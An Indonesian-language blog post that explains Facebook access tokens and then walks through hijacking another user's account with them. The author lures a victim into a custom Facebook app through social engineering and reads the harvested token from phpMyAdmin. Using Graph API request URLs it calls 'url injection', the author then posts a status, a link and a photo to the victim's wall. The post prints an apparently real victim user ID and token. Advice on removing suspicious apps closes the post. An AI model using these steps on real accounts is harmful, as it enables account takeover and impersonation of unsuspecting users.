- Apa itu Access Token ?
Access Token merupakan struktur data yang berisi informasi keamanan yang dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun Facebook) atau proses lainnya yang membutuhkan otorisasi.
- Dari mana Access Token tercipta ?
Seperti yang kita ketahui bersama, Facebook memiliki ribuan bahkan mungkin jutaan apps (aplikasi) untuk memanjakan penggunanya. Dari setiap penggunaan apps tersebutlah Access Token tercipta. Setiap Access Token akan tersimpan pada server hostingan pembuat aplikasi Facebook.
- Kenapa dikatakan Access Token berbahaya ?
Apabila Access Token akun Facebook anda diketahui oleh orang yang tidak bertanggung jawab maka orang tersebut dapat meng-update-kan status Facebook anda, mem-posting link dan dapat pula memasukkan foto/gambar tanpa perlu melakukan login ke akun Facebook anda. Mungkin diantara kita pernah mendengar beberapa kasus pengguna Facebook berurusan dengan pihak Kepolisian bahkan sampai ke depan meja hijau akibat dari status Facebook-nya.
- Bagaimana proses kerjanya ?
Di sini saya akan mempraktekkan proses kerjanya, bukan mengajarkan. Dan di akhir penjelasan nanti akan dijelaskan bagaimana cara untuk menghindarinya. Baiklah, mari kita mulai anunya...
- Pertama – tama saya akan login ke akun Facebook saya sendiri. Antara akun Facebook saya dengan Facebook korban tidak saling berteman. (jika berteman lebih baik lagi)
- Misalkan Sebelumnya, saya telah membuat sebuah aplikasi sederhana di Facebook. Dengan memanfaatkan tekhnik social engineering saya memberikan link aplikasi Facebook itu kepada korban agar tergiur untuk menggunakannya. Link aplikasinya adalah http://apps.facebook.com/via_apa_saja/ (Aplikasi Update Status Facebook Via Apa Saja)
- Sang korban tergiur dan menggunakan aplikasi Facebook dari saya.
4.Untuk lebih memastikan kawan saya itu sudah menggunakan aplikasi Facebook dari saya, saya akan login ke cpanel lalu menuju ke phpMyAdmin.
5.Dan ternyata dia telah menggunakan aplikasi Facebook saya itu. Yang ditandai kotak warna merah adalah access_token Facebook dia.
6.Mari kita cuba untuk mengupdatekan status Facebook dia dengan sedikit “url injection”
Injection url :
https://graph.facebook.com/ID-FACEBOOK/feed?method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-DIA
Menjadi :
https://graph.facebook.com/100003787395136/feed?method=POST&message=Test update status online :lol:&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD
7. Untuk melihat hasilnya klik pada "url injection" di atas lalu buka wall profil Facebook dia.
8. Seterusnya kita cuba untuk memposting LINK ke akaun Facebook kawan saya itu.
Injection url :
https://graph.facebook.com/ID/feed?method=POST&link=URL&message=Apa2je&access_token=ACCESS-TOKEN-DIA
Menjadi :
https://graph.facebook.com/100003787395136/feed?method=POST&link=http://accesstoken.blogspot.com&message=TestpostingLINK&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD
Yang terakhir, saya akan memasukkan sebuah gambar ke dalam akaun Facebook dia.
Injection url :
https://graph.facebook.com/photos?url=URL GAMBAR&method=POST&message=Ape2je&access_token=ACCESS-TOKEN-DIA
Menjadi :
https://graph.facebook.com/photos?url=http://www.cyber4rt.com/idsecconf2012/logo.png&method=POST&message=TEST UPLOAD GAMBAR&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Sr
fio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixp
QVPgZDZD
- Bagaimana cara untuk menghindari penggunaan Access Token oleh orang yang tidak bertanggungjawab?
Caranya cukup mudah iaitu:
1. Masuk ke Pengaturan Privasi Aplikasi Facebook
2. Cari aplikasi Facebook yang mencurigakan, contoh pada demo kali ini aplikasinya bernama ACCESS_TOKEN, klik edit (sunting) pada aplikasi tersebut.
3.Di sini ada beberapa pilihan, perhatikan gambar di bawah ini
ket :
merah : menghapus aplikasi dari akun Facebook Anda (direkomendasikan)
biru : menghapus akses aplikasi yang tidak Anda inginkan (pilihan)
hijau : mengatur siapa saja yang dapat melihat posting-an dari aplikasi, pilih "Only Me" (pilihan)
Akhir kata, jangan sembarang menggunakan aplikasi Facebook. Gunakan aplikasi Facebook hanya dari
sumber yang terpercaya. Sekian dan terima kasih, lebih dan kurangnya mohon dimaafkan.
Nah sekian daari saya...
Bila ada salah kata mohon dimaafkan..
Wassalamualaikum...
thank u sobat...